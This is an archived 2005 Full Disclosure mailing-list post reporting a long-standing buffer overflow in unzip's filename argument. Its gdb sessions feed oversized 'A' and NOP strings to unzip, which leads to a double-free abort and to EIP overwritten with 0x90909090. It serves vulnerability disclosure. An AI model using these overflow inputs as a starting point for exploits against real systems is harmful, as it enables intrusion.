Full Disclosure mailing list archives
Unzip *ALL* verisons ;))
From: c0ntex <c0ntexb () gmail com>
Date: Mon, 19 Dec 2005 12:06:07 +0000
Just to add to the pot, this little bug has been there a long time, mmm, around 2+ yrs. Any apps calling unzip? Any unzip archives with rather large files? ;) [c0ntex@linuxbox tmp]$ gdb -q unzip (no debugging symbols found)...Using host libthread_db library "/lib/tls/libthread_db.so.1". (gdb) r `perl -e 'print "A" x 5000'` Starting program: /usr/bin/unzip `perl -e 'print "A" x 5000'` Reading symbols from shared object read from target memory...(no debugging symbols found)...done. Loaded system supplied DSO at 0xffffe000 (no debugging symbols found)...(no debugging symbols found)...unzip: cannot find or open AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA [snip] AAAAAAAAAAAAAA.ZIP. *** glibc detected *** double free or corruption: 0x08075008 *** Program received signal SIGABRT, Aborted. 0xffffe410 in __kernel_vsyscall () (gdb) bt #0 0xffffe410 in __kernel_vsyscall () #1 0x002a2955 in raise () from /lib/tls/libc.so.6 #2 0x002a4319 in abort () from /lib/tls/libc.so.6 #3 0x002dba1b in malloc_printerr () from /lib/tls/libc.so.6 #4 0x002dc4ba in free () from /lib/tls/libc.so.6 #5 0x080543a6 in ?? () #6 0x08075008 in ?? () #7 0x00000005 in ?? () #8 0x00000000 in ?? () (gdb) frame 4 #4 0x002dc4ba in free () from /lib/tls/libc.so.6 (gdb) i r eax 0x0 0 ecx 0x10b7 4279 edx 0x6 6 ebx 0x39dff4 3792884 esp 0xbfdc2194 0xbfdc2194 ebp 0xbfdc21a8 0xbfdc21a8 esi 0x39f800 3799040 edi 0x8075008 134696968 eip 0x2dc4ba 0x2dc4ba eflags 0x200246 2097734 cs 0x73 115 ss 0x7b 123 ds 0x7b 123 es 0x7b 123 fs 0x0 0 gs 0x33 51 (gdb) x/s $edi 0x8075008: 'A' <repeats 196 times> (gdb) x/s $esi 0x39f800 <main_arena>: "\001" (gdb) 0x39f802 <main_arena+2>: "" (gdb) gdb) r `python -c 'print "\x90" * 50000'` The program being debugged has been started already. Start it from the beginning? (y or n) y warning: cannot close "shared object read from target memory": File in wrong format Starting program: /usr/bin/unzip `python -c 'print "\x90" * 50000'` Reading symbols from shared object read from target memory...(no debugging symbols found)...done. Loaded system supplied DSO at 0xffffe000 (no debugging symbols found)...(no debugging symbols found)... Program received signal SIGSEGV, Segmentation fault. 0x90909090 in ?? () (gdb) -- regards c0ntex _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Current thread:
- Unzip *ALL* verisons ;)) c0ntex (Dec 19)
- Re: Unzip *ALL* verisons ;)) Joachim Schipper (Dec 19)
- Re: Unzip *ALL* verisons ;)) c0ntex (Dec 19)
- Re: Unzip *ALL* verisons ;)) Joachim Schipper (Dec 19)
- Re: Unzip *ALL* verisons ;)) deepquest (Dec 19)
- Re: Unzip *ALL* verisons ;)) KF (lists) (Dec 19)
- Re: Unzip *ALL* verisons ;)) c0ntex (Dec 19)
- Re: Unzip *ALL* verisons ;)) KF (lists) (Dec 19)
- Re: Unzip *ALL* verisons ;)) c0ntex (Dec 19)
- Re: Unzip *ALL* verisons ;)) c0ntex (Dec 19)
- Re: Unzip *ALL* verisons ;)) GroundZero Security (Dec 19)
- Re: Unzip *ALL* verisons ;)) Joachim Schipper (Dec 19)